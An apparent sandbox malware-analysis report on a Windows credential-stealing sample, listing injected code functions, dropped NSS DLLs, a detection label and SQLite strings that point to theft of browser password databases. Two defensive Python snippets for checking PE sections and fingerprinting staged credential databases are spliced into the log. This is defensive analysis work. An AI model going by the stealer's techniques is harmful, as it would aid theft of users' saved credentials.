Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C309E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2F5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C316E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2AC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2F2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2C4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2C9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C304EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C30E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2C5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3176E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2ABEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2BFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2B9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2F77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2ADFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2D6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2EB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2F4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2B7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2EF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2C8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2CD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2D60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2CC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3150C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C31B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2BD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2FB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2CA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2AC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2DD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C302990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C312AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2A22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2D4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2BCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C31BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2C1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2EE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2E8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2ED320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2BC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2A5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C2AF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3153C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C416C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C35AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C42AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3AECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C34ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C47AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C41ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C4D8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C354DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C4DCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3E6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3EEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C430E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3D6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C35AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3F0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C356F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C412F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C490F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3BEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C35EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C42EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C350FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C498FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C424840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3A0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3DA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C4568E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3A6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C388960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3E09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C46C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3849F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C40A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C4109B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3FEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3CCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C408A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3CEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3F0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C456BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3DA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C3B4420
Source: Joe Sandbox View | Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 6C4DDAE0 appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 027543B0 appears 316 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 6C2E94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 6C2DCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: String function: 6C4D09D0 appears 121 times
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Code function: String function: 6CC2A9F0 appears 33 times
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe, 00000000.00000000.1679333257.00000000007C8000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameAMD69317154114.exeX vs f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Binary or memory string: OriginalFilenameAMD69317154114.exeX vs f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static PE information: Section: A7B&<U ZLIB complexity 0.9998899647887324
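The three static findings above (a section named A7B&<U, a nameless section, and a ZLIB complexity of 0.9999 for the oddly named section) are cheap to reproduce outside the sandbox. The following is an added example, not code from the report or from the sample: a stdlib-only Python parser of the PE section table that applies the same three checks, plus a writable-and-executable flag check, to a constructed PE image. It assumes that "ZLIB complexity" means zlib-compressed size divided by raw section size (Joe Sandbox does not state its formula), and the section-name regex is a heuristic for what a linker normally emits; the sample PE built in the code is synthetic and is not the analysed binary.

```python
import random
import re
import struct
import zlib
from dataclasses import dataclass
from typing import List, Tuple

PE_SIGNATURE = b"PE\0\0"
COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40
SCN_MEM_EXECUTE = 0x20000000  # IMAGE_SCN_MEM_EXECUTE (winnt.h)
SCN_MEM_WRITE = 0x80000000    # IMAGE_SCN_MEM_WRITE
# Heuristic: characters a well-behaved linker uses in section names.
SANE_SECTION_NAME = re.compile(r"^[A-Za-z0-9_.$]+$")


@dataclass
class Section:
    name: str               # NUL-stripped name; "" for a nameless section
    raw_size: int           # SizeOfRawData
    raw_offset: int         # PointerToRawData
    characteristics: int    # IMAGE_SCN_* flags
    zlib_complexity: float  # compressed size / raw size, capped at 1.0 (assumed metric)


def compression_ratio(data: bytes) -> float:
    """Fraction of the data that survives zlib level-9 compression.
    Packed or encrypted payloads look random and score close to 1.0."""
    if not data:
        return 0.0
    return min(1.0, len(zlib.compress(data, 9)) / len(data))


def parse_sections(pe: bytes) -> List[Section]:
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)   # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)      # SizeOfOptionalHeader
    table = coff + COFF_HEADER_SIZE + opt_size
    sections = []
    for i in range(num_sections):
        (raw_name, _vsize, _va, raw_size, raw_off, _relocs, _lines,
         _nrelocs, _nlines, chars) = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + i * SECTION_HEADER_SIZE)
        name = raw_name.split(b"\0", 1)[0].decode("latin-1")
        data = pe[raw_off:raw_off + raw_size]
        sections.append(Section(name, raw_size, raw_off, chars, compression_ratio(data)))
    return sections


def suspicious_sections(sections: List[Section], threshold: float = 0.95) -> List[Tuple[str, str]]:
    """(finding, section name) pairs for the checks the report applies."""
    findings = []
    for s in sections:
        if s.name == "":
            findings.append(("nameless section", s.name))
        elif not SANE_SECTION_NAME.match(s.name):
            findings.append(("section name contains special chars", s.name))
        if s.zlib_complexity >= threshold:
            findings.append(("high ZLIB complexity (packed or encrypted data)", s.name))
        if s.characteristics & SCN_MEM_EXECUTE and s.characteristics & SCN_MEM_WRITE:
            findings.append(("writable and executable section", s.name))
    return findings


def build_sample_pe() -> bytes:
    """Constructed 32-bit PE (not the analysed sample): a normal .text,
    an incompressible RWX section named A7B&<U, and a nameless section."""
    rng = random.Random(0x5EED)  # deterministic stand-in for an encrypted payload
    specs = [
        (b".text", bytes(range(16)) * 64, 0x60000020),                               # code, R-X
        (b"A7B&<U", bytes(rng.getrandbits(8) for _ in range(4096)), 0xE0000040),    # data, RWX
        (b"\0" * 8, b"\0" * 512, 0xC0000040),                                        # nameless, RW-
    ]
    file_align = 0x200
    opt_header = struct.pack("<H", 0x10B) + b"\0" * 222  # PE32 magic, remaining fields zeroed
    headers = 64 + 4 + COFF_HEADER_SIZE + len(opt_header) + len(specs) * SECTION_HEADER_SIZE
    first_raw = (headers + file_align - 1) // file_align * file_align
    raw_ptr, va, table, payload = first_raw, 0x1000, b"", b""
    for name, data, chars in specs:
        padded = data.ljust((len(data) + file_align - 1) // file_align * file_align, b"\0")
        table += struct.pack("<8sIIIIIIHHI", name, len(data), va, len(padded), raw_ptr, 0, 0, 0, 0, chars)
        payload += padded
        raw_ptr += len(padded)
        va += 0x1000 * ((len(padded) + 0xFFF) // 0x1000)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)  # e_lfanew: PE header at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(specs), 0, 0, 0, len(opt_header), 0x0102)
    return (dos + PE_SIGNATURE + coff + opt_header + table).ljust(first_raw, b"\0") + payload


if __name__ == "__main__":
    for finding, name in suspicious_sections(parse_sections(build_sample_pe())):
        print(f"{finding}: {name!r}")
```

To run it against a real file, replace build_sample_pe() with the file's bytes; the parser only reads the section table and the raw section data, so it is safe to run on untrusted input and does not execute anything.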
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@4/23@0/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_6C307030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_02765CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | File created: C:\Users\user\AppData\Roaming\d3d9.dll
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: AFIIEBGCAAECBGCBGCBK.2.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
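The SQL strings above come from two credential stores: the metaData/nssPrivate statements are NSS (softokn3.dll) operating on Firefox's key4.db, and the password_notes DDL found in the dropped file AFIIEBGCAAECBGCBGCBK is Chromium's "Login Data" schema, which is consistent with the stealer staging a copy of that database under a random name (the CopyFileA/DeleteFileA loops further down). During incident response the random-named copies can be attributed by schema rather than by file name. The triage helper below is an added example written for this page, not code from the report or the malware; the staged files it fingerprints are constructed in a temporary directory, and the table sets in FINGERPRINTS are the identifying tables of each store.

```python
import os
import pathlib
import sqlite3
import tempfile

SQLITE_MAGIC = b"SQLite format 3\x00"  # first 16 bytes of every SQLite 3 file

# Schema fingerprints: table sets that identify the credential stores the
# strings above come from. password_notes is Chromium's "Login Data";
# metaData/nssPublic/nssPrivate is Firefox's NSS key database (key4.db).
FINGERPRINTS = {
    "chromium_login_data": {"logins", "password_notes"},
    "nss_key4": {"metaData", "nssPublic", "nssPrivate"},
}


def sqlite_table_names(path):
    """Table names of a SQLite file opened read-only, or None if it is not SQLite."""
    with open(path, "rb") as fh:
        if fh.read(16) != SQLITE_MAGIC:
            return None
    uri = pathlib.Path(path).resolve().as_uri() + "?mode=ro"
    con = sqlite3.connect(uri, uri=True)
    try:
        return {row[0] for row in con.execute("SELECT name FROM sqlite_master WHERE type='table'")}
    finally:
        con.close()


def fingerprint_sqlite(path):
    """Label a file by schema: a known credential-store label, 'sqlite_unknown_schema', or None."""
    names = sqlite_table_names(path)
    if names is None:
        return None
    for label, required in FINGERPRINTS.items():
        if required <= names:
            return label
    return "sqlite_unknown_schema"


def build_samples(workdir):
    """Constructed stand-ins for what the stealer stages under random names (not files from the
    report): a copy of Chromium's Login Data, a copy of key4.db, and a plain-text file."""
    login_copy = os.path.join(workdir, "AFIIEBGCAAECBGCBGCBK")
    con = sqlite3.connect(login_copy)
    con.executescript("""
        CREATE TABLE logins (id INTEGER PRIMARY KEY AUTOINCREMENT, origin_url VARCHAR NOT NULL,
                             username_value VARCHAR, password_value BLOB);
        CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT,
            parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED,
            key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER,
            UNIQUE (parent_id, key));
        -- constructed row; 'v10' is the prefix Chromium puts on its AES-GCM wrapped secrets
        INSERT INTO logins (origin_url, username_value, password_value)
            VALUES ('https://example.test/login', 'alice', X'763130deadbeef');
    """)
    con.commit()
    con.close()

    key_copy = os.path.join(workdir, "BBCDEFGHIJKLMNOPQRST")
    con = sqlite3.connect(key_copy)
    con.executescript("""
        CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
        CREATE TABLE nssPublic (id PRIMARY KEY UNIQUE ON CONFLICT ABORT, a0);
        CREATE TABLE nssPrivate (id PRIMARY KEY UNIQUE ON CONFLICT ABORT, a0);
    """)
    con.commit()
    con.close()

    noise = os.path.join(workdir, "notes.txt")
    with open(noise, "wb") as fh:
        fh.write(b"plain text, not a database\n")
    return [login_copy, key_copy, noise]


def triage_directory(workdir):
    """Fingerprint every regular file in a directory; returns (name, label) sorted by name."""
    results = []
    for name in sorted(os.listdir(workdir)):
        path = os.path.join(workdir, name)
        if os.path.isfile(path):
            results.append((name, fingerprint_sqlite(path)))
    return results


def demo():
    """Build the constructed samples in a scratch directory and triage them."""
    with tempfile.TemporaryDirectory() as workdir:
        build_samples(workdir)
        return triage_directory(workdir)


if __name__ == "__main__":
    for name, label in demo():
        print(f"{name}: {label}")
```

Point triage_directory at the directory the stealer staged files in (here the INetCache folder and the process working directory) and every SQLite copy is labelled by what it was copied from, regardless of the name it was given. Opening with mode=ro avoids modifying evidence.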
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | ReversingLabs: Detection: 37%
                        Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Virustotal: Detection: 34%
                        Source: unknown | Process created: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe "C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe"
                        Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
